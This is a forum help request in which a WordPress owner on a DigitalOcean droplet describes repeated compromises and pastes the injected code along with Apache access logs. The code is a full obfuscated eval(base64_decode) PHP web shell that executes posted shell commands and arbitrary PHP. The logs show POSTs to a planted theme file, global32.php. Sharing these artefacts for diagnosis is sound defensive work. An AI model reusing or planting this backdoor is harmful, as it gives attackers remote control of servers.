DigitalOcean Wordpress instance getting attacked

February 13, 2017 785 views
WordPress Apache Ubuntu

Hey,

I've got a wordpress instance setup from the one-click digital ocean installer. It runs fine most of the time but I keep getting attacked, causing the site to go down.

I have already setup JetPack as described in this article to prevent rpc attacks, but I still seem to be getting screwed.

This keeps getting injected into my php files (wp-config.php, index.php, wp-settings.php, etc)

eval(base64_decode("JGFyclswXT0iQ2lSaGRYUm9JRDBnSW1ZeU1HUTJOVFEyTTJZeFpqVmlaalJrTldRNE56VXlPR0UxWlRJd01EUm1JanNLSkhWeWJDQTlJQ0pvZEhSd09pOHZJaTRrWDFORlVsWkZVbHNuU0ZSVVVGOUlUMU5VSjEwdUpGOVRSVkpXUlZKYkoxSkZVVlZGVTFSZlZWSkpKMTA3Q2dwbWRXNWpkR2x2YmlCa2FYTndiR0Y1WDJGMWRBPT0iOyRhcnJbMV09ImFGOW1iM0p0S0NrZ2V3b2dJQ0FnWjJ4dlltRnNJQ1IxY213N0NpQWdJQ0EvUGdvZ0lDQWdQR1p2Y20wZ1lXTjBhVzl1UFNJOFAzQm9jQ0JsWTJodklDUjFjbXdnUHo0aUlHMWxkR2h2WkQwaWNHOXpkQ0krQ2lBZ0lDQWdJQ0FnUEdsdWNIVjBJSFI1Y0dVOUluQmhjM04zYjNKa0lpQnBaRDBpY0hka0lpQnVZUT09IjskYXJyWzJdPSJiV1U5SW5CM1pDSStDaUFnSUNBZ0lDQWdQR2x1Y0hWMElIUjVjR1U5SW1ocFpHUmxiaUlnYVdROUltUnZYMkYxZEdnaUlHNWhiV1U5SW1SdlgyRjFkR2dpUGdvZ0lDQWdJQ0FnSUR4cGJuQjFkQ0IwZVhCbFBTSnpkV0p0YVhRaVBnb2dJQ0FnUEM5bWIzSnRQZ284UDNCb2NBcDlDZ3BtZFc1amRHbHZiaUJoZFE9PSI7JGFyclszXT0iZEdnb0tTQjdDaUFnSUNCbmJHOWlZV3dnSkdGMWRHZzdDaUFnSUNCcFppQW9LQ0ZwYzNObGRDZ2tYME5QVDB0SlJWc25ZWFYwYUNkZEtTa2dKaVlnS0NGcGMzTmxkQ2drWDFCUFUxUmJKMlJ2WDJGMWRHZ25YU2twS1NCN0NpQWdJQ0FnSUNBZ1pHbHpjR3hoZVY5aGRYUm9YMlp2Y20wb0tUc0tJQ0FnSUNBZ0lBPT0iOyRhcnJbNF09IklHUnBaU2dwT3dvZ0lDQWdmUW9nSUNBZ2FXWWdLR2x6YzJWMEtDUmZVRTlUVkZzblpHOWZZWFYwYUNkZEtTa2dld29nSUNBZ0lDQWdJR2xtSUNocGMzTmxkQ2drWDFCUFUxUmJKM0IzWkNkZEtTa2dld29nSUNBZ0lDQWdJQ0FnSUNCcFppQW9iV1ExS0NSZlVFOVRWRnNuY0hka0oxMHBQVDA5SkdGMWRHZ3BJQT09IjskYXJyWzVdPSJld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdjMlYwWTI5dmEybGxLQ0poZFhSb0lpeHRaRFVvSkY5UVQxTlVXeWR3ZDJRblhTa3BPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdjbVYwZFhKdUlIUnlkV1U3Q2lBZ0lDQWdJQ0FnSUNBZ0lIMGdaV3h6WlNCN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCa2FYTndiR0Y1WHc9PSI7JGFycls2XT0iWVhWMGFGOW1iM0p0S0NrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCa2FXVW9LVHNLSUNBZ0lDQWdJQ0FnSUNBZ2ZRb0tJQ0FnSUNBZ0lDQjlDaUFnSUNBZ0lDQWdaR2x6Y0d4aGVWOWhkWFJvWDJadmNtMG9LVHNLSUNBZ0lDQWdJQ0JrYVdVb0tUc0tJQ0FnSUgwS0NpQWdJQ0JwWmlBb2FYTnpaWFFvSkY5RFR3PT0iOyRhcnJbN109IlQwdEpSVnNuWVhWMGFDZGRLU2tLSUNBZ0lDQWdJQ0JwWmlBb0pGOURUMDlMU1VWYkoyRjFkR2duWFQwOVBTUmhkWFJvS1NCN0NpQWdJQ0FnSUNBZ0lDQWdJSEpsZEhWeWJpQjBjblZsT3dvZ0lDQWdJQ0FnSUgwZ1pXeHpaU0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lHUnBjM0JzWVhsZllYVjBhRjltYjNKdEtDazdDZz09IjskYXJyWzhdPSJJQ0FnSUNBZ0lDQWdJQ0FnWkdsbEtDazdDaUFnSUNBZ0lDQWdmUXA5Q2dwbWRXNWpkR2x2YmlCa2FYTndiR0Y1WDJsdWRHVnlabUZqWlNncElIc0tJQ0FnSUdkc2IySmhiQ0FrZFhKc093b2dJQ0FnUHo0S0lDQWdJRHhvZEcxc1Bnb2dJQ0FnUEhScGRHeGxQancvY0dod0lHVmphRzhnSkY5VFJWSldSVkpiSnc9PSI7JGFycls5XT0iU0ZSVVVGOUlUMU5VSjEwN0lEOCtQQzkwYVhSc1pUNEtJQ0FnSUR4emRIbHNaVDRLSUNBZ0lDQWdJQ0FqZDJsdVpHOTNjaUI3Q2lBZ0lDQWdJQ0FnSUNBZ0lHWnZiblF0YzJsNlpUb2dNVE53ZURzS0lDQWdJQ0FnSUNBZ0lDQWdZMjlzYjNJNkl6QXdabVl3TURzS0lDQWdJQ0FnSUNBZ0lDQWdZbTl5WkdWeU9nPT0iOyRhcnJbMTBdPSJNbkI0SUhOdmJHbGtJQ013TUdFd01EQTdDaUFnSUNBZ0lDQWdJQ0FnSUhkcFpIUm9Pamd3TUhCNE95Qm9aV2xuYUhRNk5UQndlRHNLSUNBZ0lDQWdJQ0FnSUNBZ1ltRmphMmR5YjNWdVpEb2dJekF3TURBd01Ec0tJQ0FnSUNBZ0lDQWdJQ0FnY0dGa1pHbHVaeTFzWldaME9qRXdjSGc3Q2lBZ0lDQWdJQ0FnZlE9PSI7JGFyclsxMV09IkNpQWdJQ0FnSUNBZ0kyTnRaQ0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lHSmhZMnRuY205MWJtUTZJQ015UmpKR01rWTdDaUFnSUNBZ0lDQWdJQ0FnSUdOdmJHOXlPaU13TUdabU1EQTdDaUFnSUNBZ0lDQWdmUW9nSUNBZ1BDOXpkSGxzWlQ0S0lDQWdJRHh6WTNKcGNIUStDZ29nSUNBZ0lDQWdJR1oxYm1OMGFXOXVJQT09IjskYXJyWzEyXT0iYkc5bmIzVjBLQ2tnZXdvZ0lDQWdJQ0FnSUNBZ0lDQmtiMk4xYldWdWRDNWpiMjlyYVdVOUltRjFkR2c5TVRzaU93b2dJQ0FnSUNBZ0lDQWdJQ0IzYVc1a2IzY3ViRzlqWVhScGIyNDlKencvY0dod0lHVmphRzhnSkhWeWJEc2dQejRuT3dvZ0lDQWdJQ0FnSUgwS0NpQWdJQ0FnSUNBZ1puVnVZM1JwYjI0Z1lRPT0iOyRhcnJbMTNdPSJhbUY0UTJGc2JHSmhZMnNvZEhoMEtTQjdDaUFnSUNBZ0lDQWdJQ0FnSUhaaGNpQjNhVzVrYjNkeUlEMGdaRzlqZFcxbGJuUXVaMlYwUld4bGJXVnVkRUo1U1dRb0ozZHBibVJ2ZDNJbktUc0tJQ0FnSUNBZ0lDQWdJQ0FnZDJsdVpHOTNjaTUyWVd4MVpUMTNhVzVrYjNkeUxuWmhiSFZsSzNSNGRDc25YRzRuT3c9PSI7JGFyclsxNF09IkNpQWdJQ0FnSUNBZ0lDQWdJSGRwYm1SdmQzSXVjMk55YjJ4c1ZHOXdJRDBnZDJsdVpHOTNjaTV6WTNKdmJHeElaV2xuYUhRN0NpQWdJQ0FnSUNBZ0lDQWdJSFpoY2lCamJXUWdQU0JrYjJOMWJXVnVkQzVuWlhSRmJHVnRaVzUwUW5sSlpDZ25ZMjFrSnlrN0NpQWdJQ0FnSUNBZ0lDQWdJR050WkM1MllXeDFaUT09IjskYXJyWzE1XT0iUFNjbk93b2dJQ0FnSUNBZ0lIMEtDaUFnSUNBZ0lDQWdablZ1WTNScGIyNGdZMkZzYkVGcVlYZ29kWEpzTEhCdmMzUmtZWFJoS1hzS0lDQWdJQ0FnSUNBZ0lDQWdMeTkyWVhJZ1ltOWtlU0E5SUdWdVkyOWtaVlZTU1VOdmJYQnZibVZ1ZENod2IzTjBaR0YwWVNrN0NpQWdJQ0FnSUNBZ0lDQWdJQzh2WVd4bGNnPT0iOyRhcnJbMTZdPSJkQ2h3YjNOMFpHRjBZU2s3SUhKbGRIVnlianNLSUNBZ0lDQWdJQ0FnSUNBZ2RtRnlJSGh0YkdoMGRIQTdDZ29nSUNBZ0lDQWdJQ0FnSUNCNGJXeG9kSFJ3SUQwZ2JtVjNJRmhOVEVoMGRIQlNaWEYxWlhOMEtDazdDaUFnSUNBZ0lDQWdJQ0FnSUhodGJHaDBkSEF1YjI1eVpXRmtlWE4wWVhSbFkyaGhibWRsSUE9PSI7JGFyclsxN109IlBTQm1kVzVqZEdsdmJpZ3Bld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lnS0hodGJHaDBkSEF1Y21WaFpIbFRkR0YwWlNBOVBTQTBJQ1ltSUhodGJHaDBkSEF1YzNSaGRIVnpJRDA5SURJd01DbDdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnWVdwaGVFTmhiR3hpWVdOcktIaHRiR2gwZEhBdWNtVnpjQT09IjskYXJyWzE4XT0iYjI1elpWUmxlSFFwT3dvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnZlFvZ0lDQWdJQ0FnSUNBZ0lDQjlDaUFnSUNBZ0lDQWdJQ0FnSUhodGJHaDBkSEF1YjNCbGJpZ2lVRTlUVkNJc0lIVnliQ3dnZEhKMVpTazdDaUFnSUNBZ0lDQWdJQ0FnSUhodGJHaDBkSEF1YzJWMFVtVnhkV1Z6ZEVobFlXUmxjaWduUTI5dWRBPT0iOyRhcnJbMTldPSJaVzUwTFZSNWNHVW5MQ0FuWVhCd2JHbGpZWFJwYjI0dmVDMTNkM2N0Wm05eWJTMTFjbXhsYm1OdlpHVmtKeWs3Q2lBZ0lDQWdJQ0FnSUNBZ0lIaHRiR2gwZEhBdWMyVnVaQ2h3YjNOMFpHRjBZU2s3Q2lBZ0lDQWdJQ0FnZlFvS0lDQWdJQ0FnSUNCbWRXNWpkR2x2YmlCb1lXNWtiR1ZGYm5SbGNpaHZMR1VwSUE9PSI7JGFyclsyMF09ImV3b2dJQ0FnSUNBZ0lDQWdJQ0JwWmlBb1pTNXJaWGxEYjJSbElEMDlJREV6S1NCN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCMllYSWdZMjFrSUQwZ1pHOWpkVzFsYm5RdVoyVjBSV3hsYldWdWRFSjVTV1FvSjJOdFpDY3BPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdkbUZ5SUhkcGJtUnZkM0lnUFNCa2IyTjFiUT09IjskYXJyWzIxXT0iWlc1MExtZGxkRVZzWlcxbGJuUkNlVWxrS0NkM2FXNWtiM2R5SnlrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCM2FXNWtiM2R5TG5aaGJIVmxQWGRwYm1SdmQzSXVkbUZzZFdVckoxeHVKQ0FuSzJOdFpDNTJZV3gxWlNzblhHNG5Pd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdZMkZzYkVGcVlYZ29KencvY0dod0lBPT0iOyRhcnJbMjJdPSJaV05vYnlBa2RYSnNPeUEvUGljc0oyRmpkR2x2YmoxamJXUW1ZMjFrUFNjclpXNWpiMlJsVlZKSlEyOXRjRzl1Wlc1MEtHTnRaQzUyWVd4MVpTa3BPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdjbVYwZFhKdUlHWmhiSE5sT3dvZ0lDQWdJQ0FnSUNBZ0lDQjlDaUFnSUNBZ0lDQWdmUW9LQ2lBZ0lDQThMM05qY2c9PSI7JGFyclsyM109ImFYQjBQZ29nSUNBZ1BHSnZaSGtnYzNSNWJHVTlJbUpoWTJ0bmNtOTFibVE2SUNNd01EQTdJajRLSUNBZ0lEeDBZV0pzWlNCM2FXUjBhRDBpTVRBd0pTSWdZbTl5WkdWeVBTSXdJaUJ6ZEhsc1pUMGlZbUZqYTJkeWIzVnVaRG9nSXpBd01Ec2dZMjlzYjNJNklDTXdaakE3SWo0S0lDQWdJQ0FnSUNBOGRISWdkdz09IjskYXJyWzI0XT0iYVdSMGFEMGlNVEF3SlNJK0NpQWdJQ0FnSUNBZ0lDQWdJRHgwWkNCM2FXUjBhRDBpTVRBd0pTSStDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQThZMlZ1ZEdWeVBnb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRHhwYm5CMWRDQjBlWEJsUFNKMFpYaDBJaUJwWkQwaVkyMWtJaUJ1WVcxbFBTSmpiV1FpSUhOMGVRPT0iOyRhcnJbMjVdPSJiR1U5SW5kcFpIUm9PaUE0TURCd2VEc2lJRzl1YTJWNVpHOTNiajBpYW1GMllYTmpjbWx3ZERwb1lXNWtiR1ZGYm5SbGNpaDBhR2x6TEdWMlpXNTBLVHNpUGdvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnUEM5alpXNTBaWEkrQ2lBZ0lDQWdJQ0FnSUNBZ0lEd3ZkR1ErQ2lBZ0lDQWdJQ0FnUEM5MGNqNEtJQ0FnSUE9PSI7JGFyclsyNl09IklDQWdJRHgwY2lCM2FXUjBhRDBpTVRBd0pTSStDaUFnSUNBZ0lDQWdJQ0FnSUR4MFpDQjNhV1IwYUQwaU1UQXdKU0krQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0E4WTJWdWRHVnlQZ29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUR4MFpYaDBZWEpsWVNCcFpEMGlkMmx1Wkc5M2NpSWdibUZ0WlQwaWQybHVaQT09IjskYXJyWzI3XT0iYjNkeUlpQnpkSGxzWlQwaWQybGtkR2c2SURnd01IQjRPeUJvWldsbmFIUTZJRGd3TUhCNE95SStQQzkwWlhoMFlYSmxZVDRLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRHd2WTJWdWRHVnlQZ29nSUNBZ0lDQWdJQ0FnSUNBOEwzUmtQZ29nSUNBZ0lDQWdJRHd2ZEhJK0NpQWdJQ0FnSUNBZ1BIUnlQangwWkQ0OFl3PT0iOyRhcnJbMjhdPSJaVzUwWlhJK1BHRWdhSEpsWmowaUl5SWdiMjVqYkdsamF6MGlhbUYyWVhOamNtbHdkRG9nYkc5bmIzVjBLQ2s3SWo1bGVHbDBQQzloUGp3dlkyVnVkR1Z5UGp3dmRHUStQQzkwY2o0S0lDQWdJRHd2ZEdGaWJHVStDaUFnSUNBOEwySnZaSGsrQ2lBZ0lDQThMMmgwYld3K0Nqdy9jR2h3Q24wS0NtWjFibU4wYVE9PSI7JGFyclsyOV09ImIyNGdhR0Z1Wkd4bFgyTnRaQ2dwSUhzS0lDQWdJSE41YzNSbGJTZ2tYMUJQVTFSYkoyTnRaQ2RkTGlJZ01qNG1NU0lwT3dwOUNncG1kVzVqZEdsdmJpQm9ZVzVrYkdWZlltOTBYMk50WkNncElIc0tJQ0FnSUdsbUlDaHBjM05sZENna1gxQlBVMVJiSjJOdFpDZGRLU2tLSUNBZ0lDQWdJQ0J6ZDJsMFkyZ29KQT09IjskYXJyWzMwXT0iWDFCUFUxUmJKMk50WkNkZEtTQjdDaUFnSUNBZ0lDQWdJQ0FnSUdOaGMyVWdKMk52WkdVbk9nb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2FHRnVaR3hsWDJKdmRGOWpiV1JmWTI5a1pTZ3BPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdZbkpsWVdzN0NpQWdJQ0FnSUNBZ0lDQWdJR05oYzJVZ0ozTm9aV3hzSnpvS0lBPT0iOyRhcnJbMzFdPSJJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2FHRnVaR3hsWDJKdmRGOWpiV1JmYzJobGJHd29LVHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJR0p5WldGck93b2dJQ0FnSUNBZ0lDQWdJQ0JrWldaaGRXeDBPZ29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdZbkpsWVdzN0NpQWdJQ0FnSUNBZ2ZRcDlDZ3BtZFc1amRHbHZiaUJvWVE9PSI7JGFyclszMl09ImJtUnNaVjlpYjNSZlkyMWtYM05vWld4c0tDa2dld29nSUNBZ2IySmZjM1JoY25Rb0tUc0tJQ0FnSUhONWMzUmxiU2hpWVhObE5qUmZaR1ZqYjJSbEtDUmZVRTlUVkZzbllYSm5KMTBwS1RzS0lDQWdJQ1J5UFc5aVgyZGxkRjlqYkdWaGJpZ3BPd29nSUNBZ2NISnBiblFnSkhJN0NuMEtDbVoxYm1OMGFXOXVJQT09IjskYXJyWzMzXT0iYUdGdVpHeGxYMkp2ZEY5amJXUmZZMjlrWlNncElIc0tJQ0FnSUc5aVgzTjBZWEowS0NrN0NpQWdJQ0JsZG1Gc0tHSmhjMlUyTkY5a1pXTnZaR1VvSkY5UVQxTlVXeWRoY21jblhTa3BPd29nSUNBZ0pISTliMkpmWjJWMFgyTnNaV0Z1S0NrN0NpQWdJQ0J3Y21sdWRDQWtjanNLZlFvS1puVnVZM1JwYjI0Z2JBPT0iOyRhcnJbMzRdPSJiMmR2ZFhRb0tTQjdDaUFnSUNCbmJHOWlZV3dnSkhWeWJEc0tJQ0FnSUhObGRHTnZiMnRwWlNnaVlYVjBhQ0lzSWpFaUtUc0tJQ0FnSUhCeWFXNTBJQ0k4YzJOeWFYQjBQbmRwYm1SdmR5NXNiMk5oZEdsdmJqMG5JaTRrZFhKc0xpSW5Pend2YzJOeWFYQjBQaUk3Q2lBZ0lDQmthV1VvS1RzS2ZRb0tDZ3BoZFE9PSI7JGFyclszNV09ImRHZ29LVHNLYVdZZ0tDRnBjM05sZENna1gxQlBVMVJiSjJGamRHbHZiaWRkS1NrS0lDQWdJR1JwYzNCc1lYbGZhVzUwWlhKbVlXTmxLQ2s3Q2dwcFppQW9hWE56WlhRb0pGOVFUMU5VV3lkaFkzUnBiMjRuWFNrcENpQWdJQ0J6ZDJsMFkyZ2dLQ1JmVUU5VFZGc25ZV04wYVc5dUoxMHBJSHNLSUNBZ0lDQWdJQT09IjskYXJyWzM2XT0iSUdOaGMyVWdKMk50WkNjNkNpQWdJQ0FnSUNBZ0lDQWdJR2hoYm1Sc1pWOWpiV1FvS1RzS0lDQWdJQ0FnSUNBZ0lDQWdZbkpsWVdzN0NpQWdJQ0FnSUNBZ1kyRnpaU0FuWW05MFkyMWtKem9LSUNBZ0lDQWdJQ0FnSUNBZ2FHRnVaR3hsWDJKdmRGOWpiV1FvS1RzS0lDQWdJQ0FnSUNBZ0lDQWdZbkpsWVdzN0NnPT0iOyRhcnJbMzddPSJJQ0FnSUNBZ0lDQmpZWE5sSUNkc2IyZHZkWFFuT2dvZ0lDQWdJQ0FnSUNBZ0lDQnNiMmR2ZFhRb0tUc0tJQ0FnSUNBZ0lDQWdJQ0FnWW5KbFlXczdDaUFnSUNBZ0lDQWdaR1ZtWVhWc2REb0tJQ0FnSUNBZ0lDQWdJQ0FnY21WMGRYSnVPd29nSUNBZ2ZRPT0iOyRzdHI9IiI7Zm9yICgkaT0wOyAkaTxjb3VudCgkYXJyKTsgJGkrKykgeyRzdHIuPWJhc2U2NF9kZWNvZGUoJGFyclskaV0pO31ldmFsKCRzdHIpOw=="));

I believe RPC is working as when I check attacks they are all just JetPack. Ther results from (grep xmlrpc /var/log/apache2/access.log) is:

108.162.215.134 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D" "Jetpack by WordPress.com"

There are some fishy lookin POSTs in my apache logs, but not sure if related:

162.158.59.140 - - [13/Feb/2017:14:03:36 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:04:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:05:34 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:05:37 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:06:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:06:21 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:06:23 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.59.128 - - [13/Feb/2017:14:06:39 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0 SeaMonkey/2.26"
162.158.58.211 - - [13/Feb/2017:14:06:56 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:07:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:07:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:08:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:08:20 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:22 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
60.241.236.163 - - [13/Feb/2017:14:08:27 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
60.241.236.163 - - [13/Feb/2017:14:08:29 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:38 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:56 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:09:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:09:55 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:11:23 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:12:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:12:39 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:13:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.134 - - [13/Feb/2017:14:13:33 -0500] "GET /wp-login.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
108.162.222.164 - - [13/Feb/2017:14:13:42 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:14:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.140 - - [13/Feb/2017:14:14:43 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:15:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.68 - - [13/Feb/2017:14:15:49 -0500] "GET /wp-login.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
162.158.69.31 - - [13/Feb/2017:14:16:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.215.212 - - [13/Feb/2017:14:16:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.245.38 - - [13/Feb/2017:14:17:03 -0500] "GET /nate?_escaped_fragment_= HTTP/1.1" 500 206 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
162.158.69.31 - - [13/Feb/2017:14:17:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:17:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.179.218 - - [13/Feb/2017:14:17:53 -0500] "GET /feed/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806"
162.158.69.31 - - [13/Feb/2017:14:18:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
